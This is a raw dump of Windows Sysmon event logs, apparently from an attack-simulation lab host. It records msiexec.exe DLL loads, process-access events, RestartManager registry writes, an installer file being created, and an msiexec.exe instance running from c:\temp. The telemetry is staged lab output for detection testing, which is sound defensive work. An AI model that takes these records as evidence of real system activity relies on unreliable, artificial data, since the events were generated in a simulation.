15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700833Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700832Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700831Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700830Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700829Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700828Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700827Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700826Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700825Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700824Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700823Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700822Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700821Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700820Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700819Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700818Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700817Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700816Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700815Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700814Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700813Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700812Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700811Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700810Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700809Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.651{7CF983DC-EE97-62A8-7E00-000000006202}18083200C:\Windows\system32\csrss.exe{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700808Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.635{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700807Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.635{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700806Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.635{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700805Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.635{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700804Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.635{7CF983DC-EE55-62A8-0500-000000006202}396412C:\Windows\system32\csrss.exe{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700803Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.635{7CF983DC-981D-62AC-1A6B-000000006202}48403724C:\Windows\system32\msiexec.exe{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Windows\system32\Msi.dll+ba6c8|C:\Windows\system32\Msi.dll+16e294|C:\Windows\system32\Msi.dll+16e90c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 154100x80000000000000002700802Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.648{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 7C173E38E1EF41FEEA4D5D00A0801E5EC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 13241300x80000000000000002700801Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:28.619{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceDWORD (0x00000001)NT AUTHORITY\SYSTEM 12241200x80000000000000002700800Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.619{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 13241300x80000000000000002700799Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:28.619{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002700798Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:28.619{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002700797Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.619{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002700796Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.619{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 10341000x80000000000000002700795Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.619{7CF983DC-981D-62AC-1A6B-000000006202}4840892C:\Windows\system32\msiexec.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19fdbd|C:\Windows\system32\Msi.dll+2ea9e|C:\Windows\system32\Msi.dll+474f5|C:\Windows\system32\Msi.dll+10b3b5|C:\Windows\system32\Msi.dll+10a5d6|C:\Windows\system32\Msi.dll+f4b9f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700794Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.619{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll4.8.3761.0 built by: NET48REL1Assembly managerMicrosoft® .NET FrameworkMicrosoft Corporationfusion.dllMD5=2A73BA7551F7B631AA484CAABD372F06,SHA256=F876EEEC603221DCDD098D1E2A1118012254E9C67851E749DF61D573EA949F55trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002700793Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.619{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002700792Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 254200x80000000000000002700791Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f514b.msi2022-06-13 14:04:24.0002022-06-17 15:05:28.604NT AUTHORITY\SYSTEM 10341000x80000000000000002700790Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002700789Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002700788Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f514b.msi2022-06-17 15:05:28.604NT AUTHORITY\SYSTEM 23542300x80000000000000002700787Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f514b.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x80000000000000002700786Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 